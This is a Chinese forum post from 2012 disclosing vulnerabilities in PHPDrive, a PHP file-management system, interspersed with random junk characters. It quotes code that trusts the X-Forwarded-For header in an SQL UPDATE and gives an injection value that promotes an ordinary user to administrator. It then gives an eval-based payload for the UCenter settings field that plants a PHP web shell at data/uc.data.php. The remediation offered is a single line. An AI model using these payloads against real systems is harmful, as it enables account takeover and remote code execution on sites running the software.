PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等, X1 V2 i6 t) p- ^$ N" ~
8 G, a7 O( |) H$ V2 b
includes/user.lib.php
& l0 K& N9 L- x, W9 ~& z! P行87
' T9 w0 I* M- n8 s function get_ip() {
! r$ J- Q' W7 n if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
( x1 a8 ?9 ~; Y' B( r在用户注册与登录 处module/disk/account.lead.php
1 V* m6 s' t( d7 O4 c198行 ) Z; Z; D, p# ]
//更新本次登录IP和时间! Q' ` W$ m8 N) m
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生6 j1 r4 J. ^3 d& G, l; u1 D
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
) c t3 o$ z/ S9 o" [实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
" O: g+ h" {2 |+ }* D9 w后台getshell:
- k. p7 }9 u, @0 t2 p在UCenter设置处,将UC数据库登录名填写为
* X3 H& |8 D% |4 q" S B
% [! h \' {; v* f2 a7 L3 B( lroot’);eval($_POST[DisKill]);?>/*
1 `! ^3 w( V B$ ~ x可以得到一个shell,位置在 data/uc.data.php
/ w) ^, K$ k5 Q. `9 h) U9 g
$ c* O5 A+ j0 c% f修复:过滤注入
% m! s- n! [. b1 n S+ u8 o" B% r l* F' Z$ S1 P1 C2 h
|
发表于 2012-12-31 09:18:34
收藏
支持
反对